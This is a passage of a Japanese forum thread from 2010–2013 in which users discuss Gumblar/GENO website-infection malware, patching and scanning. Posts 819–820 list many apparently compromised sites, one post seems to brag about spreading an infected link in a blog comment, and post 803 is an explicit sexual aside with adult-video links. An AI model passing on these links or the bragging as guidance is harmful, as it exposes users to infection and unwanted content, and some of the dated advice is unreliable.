2010/03/07 10:46:37 感染しています トロイの木馬 Trojan-Downloader.JS.Pegel.b Webサイト ttp://irving-maichima●jp/common/ menu.js アプリケーションを仮想実行中です 高
803◇いつも完璧、それがノートンのセキュリティです。:2010/03/07(日) 11:21:34
>>802

トロイは全部カスペの自演です♪
と言いたいところだが本当だ。
当時はピンサロ平塚ジャンジャンが有名で
ロシア人とのハーフである光月夜也のまんまんを
ペロンペロンに舐めまくっていた。
ボーッとしてると従業員に「お客さんちゃんと舐めてくださいよ」と
叱られた記憶もある。
花びら3回転だったしもちろん生尺。
近所の紅花という定食屋でサインを貰おうとした記憶がある。

http://www.yourfilehost.com/media.php?cat=video&file=pinsaro_part001.wmv
http://www.yourfilehost.com/media.php?cat=video&file=pinsaro_part002.wmv
http://www.yourfilehost.com/media.php?cat=video&file=pinsaro_part003.wmv
http://www.premium-beauty.com/images/works/pgd/pgd351/pgd351jp-12.jpg
804名無しさん@お腹いっぱい。:2010/03/07(日) 13:57:15
>>801
電凸完了
805名無しさん@お腹いっぱい。:2010/03/08(月) 00:40:45
>>804

てか、
ttp://ameblo.jp/maiko6041/に米したんだけどな
携帯大喜利にでてたから直後のgoogle検索で結構上位にいたぞ。
セキュリティ意識の甘いやつみんな感染\(^o^)/
806名無しさん@お腹いっぱい。:2010/03/08(月) 00:46:03
>google検索で結構上位にいたぞ。
Google 急上昇ワード
807名無しさん@お腹いっぱい。:2010/04/05(月) 12:26:08
>>770
foxitはマイナーすぎて攻撃側が対応してないだろ
Adobeのしか攻撃ターゲットになってない
808Searchくん:2010/04/06(火) 16:25:04
JSを無効化すると、いろいろなサイトは使いにくくなる、なかなか理想な方法は見つからない。
今日、このサイトを見つかりました。
http://www.sequsa.co.jp
809名無しさん@お腹いっぱい。:2010/04/09(金) 01:11:23
日本語でおk
810名無しさん@お腹いっぱい。:2010/04/12(月) 10:56:23
一応>>1の対策は取ってるが
Adobereaderが8だった
アップデートしても8じゃムダなのかな?
オンラインスキャンページも感染してるんじゃねと怖くて
いつも感染確認はプログラムからcmd.exeとregedit.exeの起動な俺
811名無しさん@お腹いっぱい。:2010/04/12(月) 14:23:40
>>810
情報古いよー!
812名無しさん@お腹いっぱい。:2010/04/12(月) 14:39:16
志村ー、日付日付ー!

1 名前:名無しさん@お腹いっぱい。 [] 投稿日:2009/12/01(火) 04:01:23
813名無しさん@お腹いっぱい。:2010/04/12(月) 17:09:17
>>810
情報古すぎて無効なので今更そんな確認しても無駄です
オンラインスキャンのページが感染してたらとっくに騒ぎになってるはずだと思わないか?
そのくせに>>1の確認方法を信じるという思考が謎すぎる
おとなしくニフティのスキャンでもやっとけよ

こわいなら素直にOS入れなおせばおk
814名無しさん@お腹いっぱい。:2010/04/12(月) 17:45:29
>>813
それもそうだな、と思ってオンラインスキャン入れようとしたらアップデート失敗した
スキャン前に最新のウイルス定義データベースに〜と言われる
kaspersky online scanner pro gui partが検索してもどういうのかさっぱりだし
情報バーの選択肢が「アドオンの実行」「全てのwebサイトで〜」しか無くて怖くて実行してなかったんだが
これがまずかったのかな
815名無しさん@お腹いっぱい。:2010/04/12(月) 18:16:37
スマン、インし直したら開始できた
推奨スキャンで完了するまで17分ほどスキャンしたが特にウイルスは無し
こんな無知な奴に助言ありがとう>>813
816名無しさん@お腹いっぱい。:2010/04/12(月) 18:35:20
対策についてはこっちより↓の上の方を見た方が良いよ
http://pc11.2ch.net/test/read.cgi/sec/1268059684/
817名無しさん@お腹いっぱい。:2010/04/12(月) 19:23:04
>>816
ありがとう
java(TM)6は最新版のupdate19に更新してるんだけど、
J2SE Runtimeの方は記憶に無いんだ
かといってruntimeの更新確認しようとすると決まってjava6 update19のダウンロードページにたどり着く、JRE単独の更新ページが見つからない
コントロールパネルだと別々だけどjava(TM)=JREなのかな
818名無しさん@お腹いっぱい。:2010/04/12(月) 19:34:40
>>817
java 0-day 出てるんで、update20が出るまでアンインストール
しとくのが吉かと。
819名無しさん@お腹いっぱい。:2010/04/12(月) 19:41:55
こっちのスレは過疎ってるから保存用にするか
http://www.tirashi.jp/
http://www.footsal-club.net/
http://www.pokebai.net/
http://www.jc-consulting.jp/
http://www.mog-mmy.com/
http://www.ichiryuimono.com/
http://www.oracle-shop.net/
http://pacific-staff.net/
http://hoikuen.19th.org/
http://cre2cash.2pg.in/
http://sunrise.2pg.in/
http://netnavi.boo.jp/leopalace/link/
http://www.toutyann.com/
http://www.unique-gifts-ideas.com/contact_us.html
http://ayaka.echoll.net/
http://fleur.webinfo.jp/
http://dog-g-club.com/
http://www.bestofunder.com/
http://moebox.com/link.html
http://www.ferahdondurma.com/
http://neta-script.lionking.jp/
http://www.e-tokunaga.co.jp/contents/house_dock/index.html
http://www.vericapandilovska.com.mk/
820名無しさん@お腹いっぱい。:2010/04/12(月) 19:43:11
http://this.is/ausgot/
http://capvex.com/
http://egujarat.net/
http://reagold.com/
http://freett.com/takarafune/index.html
http://www.geocities.jp/shimilw/
http://www.geocities.jp/o_tweb/
http://ss-gaido.info/
http://jyo.eisuku.com/home/
http://adgaw.com/lovesheet/index.html
http://www.borneomarathon.com/jpn/home.html
http://www.aparajeyo.org/index.php
http://www.niaufuku.com/index.htm
http://fukunekodo.com/index/
http://www.collco.jp/works/index.html
http://www.kyoudoumusen.jp/index.html
http://www.npo-aichi.or.jp/content/index.php
http://creole.jp/
http://kumarin.biz/
http://www.amakusaturigu.com/html/
http://hrhr.sakura.ne.jp
http://www.bandoolshien.com
http://www.hdta.jp

追加があったらまたヨロシクね
821名無しさん@お腹いっぱい。:2010/04/12(月) 20:04:40
…上ふたつ、あぼんしたが宜しいか?
822名無しさん@お腹いっぱい。:2010/04/12(月) 20:39:15
>>817
何を言っているのかわからん
必要な部分を省略しすぎてる上に自分でも理解できない用語を使ってるのがすごくわかる
JREって意味わかって使ってんの?J2SE RuntimeもJREだろ

とりあえず古いバージョンのJavaランタイムが残ってるならアンインストールでおk
わからなかったらJava関連全部アンインストールすればおk
どうせ使ってないだろうし使ってないソフトはアンインストール推奨
823名無しさん@お腹いっぱい。:2010/04/12(月) 20:46:45
>>821
おねがいします
824名無しさん@お腹いっぱい。:2010/04/13(火) 03:37:17
GENOで注文したら変なメールが急にたくさん届いたけどこれヤバイの?
825名無しさん@お腹いっぱい。:2010/04/14(水) 07:05:21
>>808
http://boo.2ch.net/boo2008.cgi?type=red&boo2008_uri=http%3A%2F%2Fpc11.2ch.net%2Ftest%2Fread.cgi%2Fsec%2F1259607683%2F808&boo2008_time=2010%2F04%2F06%28%89%CE%29+16%3A25%3A04&boo2008_id=&boo2008_port=&boo2008_trip=
宣伝乙
826名無しさん@お腹いっぱい。:2010/04/14(水) 22:46:33
>>824
白カードでも買ったのか?
827名無しさん@お腹いっぱい。:2010/05/06(木) 04:15:32
>>824
変なメールとは?
828名無しさん@お腹いっぱい。:2010/05/07(金) 17:05:18
        ,, ―- 、_
      /        '' - ,,
    /             '' - ,,
   /                 ヽ
  i           / /ヽ    !
  ,i          ./ / ''―、   !
  i     ,、 n て'' ノノ    ヾ   !
  i    ノノノ ノ ノ ''´      !  /
 U   j   ' ´    ノ (    ヽ |
 >-,,  /  ,,=━━・!' ,ノ━== ! ノ
 !・  ヽ |  ’ニンniii、 :::::i/ィ7iii=  i )
 \(てi iヽ   ^' ~     -'  /}
  `i_   、 \        i_    l_j
   `┐ i    /(,,, ,n 〉   /\\   物売るっていうレベルじゃねぇぞ!
  ̄ ̄へ    ! '   T''    l |  \
   |  ! i    ン=ェェi) i ソ )
   |  i´\! ,, -ェ`、_ン ノノ 〈
   |  |  \\,, `―''´//  |
   |  つ   !、_'''''''''''''  /   7
829名無しさん@お腹いっぱい。:2010/05/10(月) 14:40:38
(゚Д゚)ハァ?
830名無しさん@お腹いっぱい。:2010/06/05(土) 12:16:13
キリッ
831名無しさん@お腹いっぱい。:2010/06/11(金) 02:49:09
アッー
832名無しさん@お腹いっぱい。:2010/06/24(木) 21:28:47
       ∧∧
       (д´* )
       (⊃⌒*⌒⊂)
        /__ノωヽ__)
833名無しさん@お腹いっぱい。:2010/06/24(木) 21:44:44
http://www.itmedia.co.jp/enterprise/articles/1003/09/news088.html
>従来から日本のマルウェア感染は海外に比べて少ないと言われてきたものの、Trojan.Bredolabでは日本の感染被害が目立つ状況になった。

なんでGumblarに限って日本での被害が多いんですかね?

http://blogs.yahoo.co.jp/noooo_spam/59837855.html
>Gumblar.xの改ざんコードは日本のIPアドレスからのアクセスを弾く!?

攻撃側も日本がウザいらしい
834名無しさん@お腹いっぱい。:2010/07/21(水) 14:11:31
!?
835名無しさん@お腹いっぱい。:2010/07/21(水) 14:54:35
AVGで誤検出が発生してるみたいだね
836名無しさん@お腹いっぱい。:2010/07/28(水) 22:29:50
 
837名無しさん@お腹いっぱい。:2010/09/12(日) 09:48:25
 
838名無しさん@お腹いっぱい。:2010/09/25(土) 11:37:44
 
839名無しさん@お腹いっぱい。:2010/11/30(火) 18:14:34
 
840名無しさん@お腹いっぱい。:2010/12/14(火) 19:59:10
もう終わったの?
841名無しさん@お腹いっぱい。:2010/12/15(水) 21:01:21
今日VISTA 64bitでやられた・・・
842名無しさん@お腹いっぱい。:2010/12/15(水) 22:23:04
>>841
kwsk
843名無しさん@お腹いっぱい。:2010/12/15(水) 22:32:22
スクリプト切ってなかったの
844名無しさん@お腹いっぱい。:2010/12/15(水) 22:38:26
>>843
ぉっ。
OSのうpだてとフラッシュ・JAVA・PDFやQuicktimeとかとかのうpだてもしなかったの?
845841:2010/12/15(水) 23:58:53
黒画面でポインタしかうごかね

LinuxのCDブーストでHDはいきとるの確認

セキュリティ高くないPCだからしゃーない

解決策探してここに来たから、
うまく説明できない
聞きたいことを逆にkwsk
846名無しさん@お腹いっぱい。:2010/12/16(木) 00:25:22
Windows7だけど、Windowsのユーザー権限を変更したら
>黒画面でポインタしかうごかね
になって焦ったことがあるよ
847名無しさん@お腹いっぱい。:2010/12/16(木) 11:42:39
>>845
どこのサイトで感染?
848名無しさん@お腹いっぱい。:2010/12/16(木) 11:53:49
>>847
確認方法おしえて
そしたら調べるっす
849名無しさん@お腹いっぱい。:2010/12/16(木) 13:57:58
そもそもどのタイミングで何故感染したと分かったんだ
850名無しさん@お腹いっぱい。:2010/12/16(木) 19:17:20
Vistaは感染しにくいはずだが
851名無しさん@お腹いっぱい。:2010/12/16(木) 20:52:26
>黒い画面にマウスカーソル・マウスポインターのみ表示され、
>Windowsが起動しない。セーフモードでも起動することはできません。

この症状ってGENOウイルス亜種じゃないのかお?
852名無しさん@お腹いっぱい。:2010/12/17(金) 00:13:28
ここチェックしてる人いるんだね
安心した
853名無しさん@お腹いっぱい。:2010/12/21(火) 21:20:18
ゲノン総督
854名無しさん@お腹いっぱい。:2010/12/22(水) 11:10:40
ドルドレイ攻略
855名無しさん@お腹いっぱい。:2011/01/08(土) 15:54:30
株式会社GENO - ECサイト運営スタッフ募集
http://www.find-job.net/list/j83468.html?from=23
856ななし。:2011/07/27(水) 23:06:44.21
カ オ ス ラ ウ ン ジ ゆ る せ な ぁ い ー
857名無しさん@お腹いっぱい。:2011/07/30(土) 01:13:55.22
http://img851.imageshack.us/img851/6761/gameplayjenkey020110729.jpg
858 ◆aaZN3XicO. :2011/08/23(火) 23:50:41.04
tes
859名無しさん@お腹いっぱい。:2011/08/26(金) 13:48:47.41
絶滅
860名無しさん@お腹いっぱい。:2013/02/19(火) 13:11:44.38
win7だけど定期的に真っ暗になる
再起動何回かすると元に戻るけど
861名無しさん@お腹いっぱい。:2013/07/04(木) NY:AN:NY.AN
保守
862名無しさん@お腹いっぱい。:2013/07/05(金) NY:AN:NY.AN ID:THPl539/!
>>860
バックライトが切れかかってるんじゃね?
863名無しさん@お腹いっぱい。:2013/09/29(日) 21:19:37.09
保守
864名無しさん:2013/10/14(月) 22:46:25.54 ID:???
MSEだと特定のページでメッセージが出るらしい、またやらかしたのか?
865名無しさん@お腹いっぱい。
>>851
うわあ今の俺だ
コンセント抜いてしばらく置いたらなぜか通常起動したけど、ビビってウイルス検索始めた